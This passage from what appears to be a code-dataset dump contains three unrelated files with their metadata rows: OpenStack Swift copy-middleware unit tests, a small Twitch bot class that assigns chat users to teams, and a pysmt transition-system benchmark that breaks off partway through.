self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_bad_destination_account(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': '/i/am/bad'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
    def test_COPY_with_metadata(self):
        """User metadata supplied on the COPY request is sent with the
        destination PUT and echoed back in the response headers."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
        self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o',
                            environ={'REQUEST_METHOD': 'COPY'},
                            headers={'Destination': '/c/o',
                                     'X-Object-Meta-Ours': 'okay'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        # The second backend call is the PUT of the copy target.
        calls = self.app.calls_with_headers
        method, path, req_headers = calls[1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o', path)
        self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
        self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
        # Both the source read and the destination write are authorized.
        self.assertEqual(len(self.authorized), 2)
        self.assertEqual('GET', self.authorized[0].method)
        self.assertEqual('/v1/a/c/o', self.authorized[0].path)
        self.assertEqual('PUT', self.authorized[1].method)
        self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_with_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'X-Object-Meta-Ours': 'okay',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_in_OPTIONS_response(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertNotIn('swift.orig_req_method', req.environ)
def test_COPY_in_OPTIONS_response_CORS(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT',
'Access-Control-Allow-Methods': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertTrue(('Access-Control-Allow-Methods',
'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
    def _test_COPY_source_headers(self, extra_put_headers):
        """Drive a COPY and return the headers sent on the backend PUT.

        Registers a source GET whose response carries a fixed set of
        user/sysmeta/transient-sysmeta and entity headers, performs a
        COPY to /c1/o with ``extra_put_headers`` merged into the COPY
        request, and asserts the copy succeeds and that metadata added
        on the COPY request is forwarded to the PUT. Returns the PUT
        request headers so callers can assert how the source headers
        were carried over, replaced, or dropped.
        """
        put_headers = {'Destination': '/c1/o',
                       'X-Object-Meta-Test2': 'added',
                       'X-Object-Sysmeta-Test2': 'added',
                       'X-Object-Transient-Sysmeta-Test2': 'added'}
        put_headers.update(extra_put_headers)
        get_resp_headers = {
            'X-Timestamp': '1234567890.12345',
            'X-Backend-Timestamp': '1234567890.12345',
            'Content-Type': 'text/original',
            'Content-Encoding': 'gzip',
            'Content-Disposition': 'attachment; filename=myfile',
            'X-Object-Meta-Test': 'original',
            'X-Object-Sysmeta-Test': 'original',
            'X-Object-Transient-Sysmeta-Test': 'original',
            'X-Foo': 'Bar'}
        self.app.register(
            'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers)
        self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers)
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        calls = self.app.calls_with_headers
        self.assertEqual(2, len(calls))
        # calls[0] is the source GET; calls[1] is the destination PUT.
        method, path, req_headers = calls[1]
        self.assertEqual('PUT', method)
        self.assertEqual('added', req_headers.get('X-Object-Meta-Test2'))
        self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2'))
        self.assertEqual('added',
                         req_headers.get('X-Object-Transient-Sysmeta-Test2'))
        return req_headers
def test_COPY_source_headers_no_updates(self):
req_headers = self._test_COPY_source_headers({})
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=myfile',
req_headers.get('Content-Disposition'))
self.assertEqual('original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_source_headers_with_updates(self):
put_headers = {
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_x_fresh_metadata_no_updates(self):
put_headers = {
'X-Fresh-Metadata': 'true',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertIn('X-Fresh-Metadata', req_headers)
self.assertNotIn('X-Object-Meta-Test', req_headers)
self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers)
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
self.assertNotIn('Content-Encoding', req_headers)
self.assertNotIn('Content-Disposition', req_headers)
self.assertNotIn('X-Foo', req_headers)
def test_COPY_x_fresh_metadata_with_updates(self):
put_headers = {
'X-Fresh-Metadata': 'true',
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
    def test_COPY_with_single_range(self):
        """A Range header on COPY copies only the requested byte range."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
                          {'etag': 'bogus etag'}, "abcdefghijklmnop")
        self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
        req = swob.Request.blank(
            '/v1/a/c/o', method='COPY',
            headers={'Destination': 'c1/o',
                     'Range': 'bytes=5-10'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        calls = self.app.calls_with_headers
        self.assertEqual(2, len(calls))
        method, path, req_headers = calls[1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c1/o', path)
        # The source etag must not be forwarded: a partial copy has a
        # different etag than the full source object.
        self.assertNotIn('etag', (h.lower() for h in req_headers))
        self.assertEqual('6', req_headers['content-length'])
        # bytes 5-10 (inclusive) of "abcdefghijklmnop" -> "fghijk"
        req = swob.Request.blank('/v1/a/c1/o', method='GET')
        status, headers, body = self.call_ssc(req)
        self.assertEqual('fghijk', body)
@patch_policies(with_ec_default=True)
class TestServerSideCopyMiddlewareWithEC(unittest.TestCase):
container_info = {
'status': 200,
'write_acl': None,
'read_acl': None,
'storage_policy': None,
'sync_key': None,
'versions': None,
}
def setUp(self):
self.logger = debug_logger('proxy-server')
self.logger.thread_locals = ('txn1', '127.0.0.2')
self.app = PatchedObjControllerApp(
None, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=self.logger)
self.ssc = copy.filter_factory({})(self.app)
self.ssc.logger = self.app.logger
self.policy = POLICIES.default
self.app.container_info = dict(self.container_info)
def test_COPY_with_single_range(self):
req = swob.Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Destination': 'c1/o',
'Range': 'bytes=5-10'})
segment_size = self.policy.ec_segment_size
real_body = ('asdf' * segment_size)[:-10]
chunks = [real_body[x:x + segment_size]
for x in range(0, len(real_body), segment_size)]
fragments = self.policy.pyeclib_driver.encode(chunks[0])
fragment_payloads = []
fragment_payloads.append(fragments)
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments),
self.policy.object_ring.replicas)
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))}
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
responses += [(201, '', {})] * self.policy.object_ring.replicas
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
put_hdrs = []
def capture_conn(host, port, dev, part, method, path, *args, **kwargs):
if method == 'PUT':
put_hdrs.append(args[0])
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers,
give_connect=capture_conn):
resp = req.get_response(self.ssc)
self.assertEqual(resp.status_int, 201)
expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity
self.assertEqual(expected_puts, len(put_hdrs))
for hdrs in put_hdrs:
self.assertNotIn('etag', (h.lower() for h in hdrs))
def test_COPY_with_invalid_ranges(self):
segment_size = self.policy.ec_segment_size
real_body = ('a' * segment_size)[:-10]
self._test_invalid_ranges('COPY', real_body,
segment_size, '%s-' % (segment_size - 10))
self._test_invalid_ranges('COPY', real_body,
segment_size, '%s-' % (segment_size + 10))
def _test_invalid_ranges(self, method, real_body, segment_size, req_range):
body_etag = md5(real_body).hexdigest()
req = swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'Destination': 'c1/o',
'Range': 'bytes=%s' % (req_range)})
fragments = self.policy.pyeclib_driver.encode(real_body)
fragment_payloads = [fragments]
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments),
self.policy.object_ring.replicas)
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)),
'X-Object-Sysmeta-Ec-Etag': body_etag}
start = int(req_range.split('-')[0])
self.assertTrue(start >= 0)
title, exp = swob.RESPONSE_REASONS[416]
range_not_satisfiable_body = \
'<html><h1>%s</h1><p>%s</p></html>' % (title, exp)
if start >= segment_size:
responses = [(416, range_not_satisfiable_body, headers)
for i in range(POLICIES.default.ec_ndata)]
else:
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers):
resp = req.get_response(self.ssc)
self.assertEqual(resp.status_int, 416)
self.assertEqual(resp.content_length, len(range_not_satisfiable_body))
self.assertEqual(resp.body, range_not_satisfiable_body)
self.assertEqual(resp.etag, body_etag)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
| true
| true
|
f705def54e26d0238b7f51ef53f14a89af887b66
| 1,087
|
py
|
Python
|
src/bot/TeamData.py
|
malmgrens4/TwIOTch
|
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
|
[
"MIT"
] | null | null | null |
src/bot/TeamData.py
|
malmgrens4/TwIOTch
|
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
|
[
"MIT"
] | null | null | null |
src/bot/TeamData.py
|
malmgrens4/TwIOTch
|
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
|
[
"MIT"
] | null | null | null |
from typing import Dict
from twitchio.dataclasses import Message
class TeamData:
    """Tracks which team each chat user belongs to.

    Users are identified by ``msg.author.id``. The first ``num_teams``
    joiners each seed a new team (ids 0..num_teams-1); every later
    joiner is placed on the team that currently has the fewest members
    (ties go to the first such team in insertion order).
    """

    def __init__(self, num_teams: int = 2):
        # All mutable state is set up in reset() so that construction
        # and reset cannot drift apart.
        self.reset(num_teams)

    async def handle_join(self, msg: "Message") -> None:
        """Assign the message's author to a team.

        No-op if the user is already on a team.
        """
        user_id = msg.author.id
        if user_id in self.teams:
            # User already on a team.
            return
        assigned = self.teams.values()
        if len(assigned) < self.num_teams:
            # Seed teams 0..num_teams-1 with the first joiners.
            self.teams[user_id] = len(assigned)
            return
        # Count members per team and join the least-populated one.
        team_counts: Dict[int, int] = {}
        for team_id in assigned:
            team_counts[team_id] = team_counts.get(team_id, 0) + 1
        self.teams[user_id] = min(team_counts, key=team_counts.get)

    def get_team_member_map(self) -> Dict[int, list]:
        """Return the inverse mapping: team id -> list of user ids."""
        reverse_dict: Dict[int, list] = {}
        for user_id, team_id in self.teams.items():
            reverse_dict.setdefault(team_id, []).append(user_id)
        return reverse_dict

    def reset(self, num_teams: int = 2) -> None:
        """Drop all team assignments and start over with ``num_teams`` teams."""
        self.num_teams = num_teams
        # user id -> team id
        self.teams: Dict[int, int] = {}
| 29.378378
| 73
| 0.609016
|
from typing import Dict
from twitchio.dataclasses import Message
class TeamData:
def __init__(self, num_teams: int = 2):
self.num_teams = num_teams
self.teams: Dict[int, int] = {}
async def handle_join(self, msg: Message) -> None:
if msg.author.id in self.teams:
return
all_teams = self.teams.values()
if len(all_teams) < self.num_teams:
self.teams[msg.author.id] = len(all_teams)
return
team_counts: Dict[int, int] = {}
for team_id in all_teams:
team_counts[team_id] = team_counts.setdefault(team_id, 0) + 1
min_member_team_id = min(team_counts, key=team_counts.get)
self.teams[msg.author.id] = min_member_team_id
def get_team_member_map(self):
reverse_dict = {}
for k, v in self.teams.items():
reverse_dict.setdefault(v, []).append(k)
return reverse_dict
def reset(self, num_teams: int = 2):
self.num_teams = num_teams
self.teams: Dict[int, int] = {}
| true
| true
|
f705df36178023a0b1008fe69f304ba47ddbd2e2
| 7,661
|
py
|
Python
|
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(y >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
# pc = 0 & y >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
# pc = 1 & !(z >= 1) : -1,
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
# pc = 1 & z >= 1 : 2,
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
# pc = 2 & !(x >= 0) : -1,
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
# pc = 2 & x >= 0 : 3,
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
# pc = 3 : 4,
mgr.Implies(pcs[3], x_pcs[4]),
# pc = 4 : 2,
mgr.Implies(pcs[4], x_pcs[2]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
# (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
